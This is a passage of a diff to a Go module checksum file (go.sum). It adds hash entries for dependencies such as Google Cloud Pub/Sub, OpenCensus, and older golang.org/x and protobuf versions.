cloud.google.com/go/logging v1.13.1 h1:O7LvmO0kGLaHY/gq8cV7T0dyp6zJhYAOtZPX4TF3QtY= cloud.google.com/go/logging v1.13.1/go.mod h1:XAQkfkMBxQRjQek96WLPNze7vsOmay9H5PqfsNYDqvw= cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qoboQT1E= @@ -30,6 +33,10 @@ cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTo cloud.google.com/go/orgpolicy v1.15.1/go.mod h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= +cloud.google.com/go/pubsub v1.50.1 h1:fzbXpPyJnSGvWXF1jabhQeXyxdbCIkXTpjXHy7xviBM= +cloud.google.com/go/pubsub v1.50.1/go.mod h1:6YVJv3MzWJUVdvQXG081sFvS0dWQOdnV+oTo++q/xFk= +cloud.google.com/go/pubsub/v2 v2.0.0 h1:0qS6mRJ41gD1lNmM/vdm6bR7DQu6coQcVwD+VPf0Bz0= +cloud.google.com/go/pubsub/v2 v2.0.0/go.mod h1:0aztFxNzVQIRSZ8vUr79uH2bS3jwLebwK6q1sgEub+E= cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= @@ -94,6 +101,7 @@ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1 h1:WJ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1/go.mod h1:tCcJZ0uHAmvjsVYzEFivsRTN00oz5BEsRgQHu5JZ9WE= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0 h1:XRzhVemXdgvJqCH0sFfrBUTnUJSBrBf7++ypk+twtRs= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0/go.mod h1:HKpQxkWaGLJ+D/5H8QRpyQXA1eKjxkFlOMwck5+33Jk= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 h1:lhhYARPUu3LmHysQ/igznQphfzynnqI3D75oUyw1HXk= @@ -250,6 +258,7 @@ github.com/bishopfox/awsservicemap v1.1.0 h1:MM+rmGsXjkBtFR1IlS+GpVKR2srGr+V4l/J github.com/bishopfox/awsservicemap v1.1.0/go.mod h1:oy9Fyqh6AozQjShSx+zRNouTlp7k3z3YEMoFkN8rquc= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb h1:ot96tC/kdm0GKV1kl+aXJorqJbyx92R9bjRQvbBmLKU= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb/go.mod h1:2OnSqu4B86+2xGSIE5D4z3Rze9yJ/LNNjNXHhwMR+vY= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs= @@ -268,12 +277,14 @@ github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91 h1:payR github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.6.1 h1:/zMlAezfDzT2xy6acHBzwIfyu2ic0hgkT83UX5EY2gY= github.com/clipperhouse/displaywidth v0.6.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o= github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs= github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA= github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4= github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= @@ -285,12 +296,16 @@ github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= github.com/dominikbraun/graph v0.23.0 h1:TdZB4pPqCLFxYhdyMFb1TBdFxp8XLcJfTTBQucVPgCo= github.com/dominikbraun/graph v0.23.0/go.mod h1:yOjYyogZLY1LSG9E33JWZJiq5k83Qy2C6POAuiViluc= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329 h1:K+fnvUM0VZ7ZFJf0n4L/BRlnsb9pL/GuDG6FqaH+PwM= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329/go.mod h1:Alz8LEClvR7xKsrq3qzoc4N0guvVNSS8KmSChGYr9hs= github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4= @@ -323,16 +338,37 @@ github.com/golang-jwt/jwt/v4 v4.5.2 h1:YtQM7lnr8iZ+j5q71MGKkNw9Mn7AjHM68uc9g5fXe github.com/golang-jwt/jwt/v4 v4.5.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l8iNU+DwB5epxmsaqB+rhGL0m5jtYqE= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/flatbuffers v25.9.23+incompatible h1:rGZKv+wOb6QPzIdkM2KxhBZCDrA0DeN6DNmRDrqIsQU= github.com/google/flatbuffers v25.9.23+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/martian/v3 v3.3.3 h1:DIhPTQrbPkgs2yJYdXU/eNACCG5DVQjySNRNlflZ9Fc= github.com/google/martian/v3 v3.3.3/go.mod h1:iEPrYcgCF7jA9OtScMFQyAlZZ4YXTKEtJ1E6RWzmBA0= github.com/google/s2a-go v0.1.9 h1:LGD7gtMgezd8a/Xak7mEWL0PjoTQFvpRudN895yqKW0= github.com/google/s2a-go v0.1.9/go.mod h1:YA0Ei2ZQL3acow2O62kdp9UlnvMmU7kA6Eutn0dXayM= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.7 h1:zrn2Ee/nWmHulBx5sAVrGgAa0f2/R35S4DJwfFaUPFQ= @@ -390,6 +426,7 @@ github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= @@ -413,6 +450,7 @@ github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UV github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= @@ -423,8 +461,12 @@ github.com/zeebo/assert v1.3.0 h1:g7C04CbJuIDKNPFHmsk4hwZDO5O+kntRxzaUoNXj+IQ= github.com/zeebo/assert v1.3.0/go.mod h1:Pq9JiuJQpG8JLJdtkwrJESF0Foym2/D9XMU5ciN/wJ0= github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0= github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA= +go.einride.tech/aip v0.73.0 h1:bPo4oqBo2ZQeBKo4ZzLb1kxYXTY1ysJhpvQyfuGzvps= +go.einride.tech/aip v0.73.0/go.mod h1:Mj7rFbmXEgw0dq1dqJ7JGMvYCZZVxmGOR3S4ZcV5LvQ= go.mongodb.org/mongo-driver v1.17.6 h1:87JUG1wZfWsr6rIz3ZmpH90rL5tea7O3IHuSwHUpsss= go.mongodb.org/mongo-driver v1.17.6/go.mod h1:Hy04i7O2kC4RS06ZrhPRqj/u4DTYkFDAAccj+rVKqgQ= +go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= +go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= @@ -447,18 +489,29 @@ go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6 go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4= golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9 h1:MDfG8Cvcqlt9XXrmEiD4epKn7VJHZO84hejP9Jmp0MM= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI= golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= @@ -466,14 +519,20 @@ golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= @@ -509,26 +568,50 @@ golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI= golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= +golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA= golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.257.0 h1:8Y0lzvHlZps53PEaw+G29SsQIkuKrumGWs9puiexNAA= google.golang.org/api v0.257.0/go.mod h1:4eJrr+vbVaZSqs7vovFd1Jb/A6ml6iw2e6FBYf3GAO4= +google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= +google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= +google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= +google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= +google.golang.org/genproto 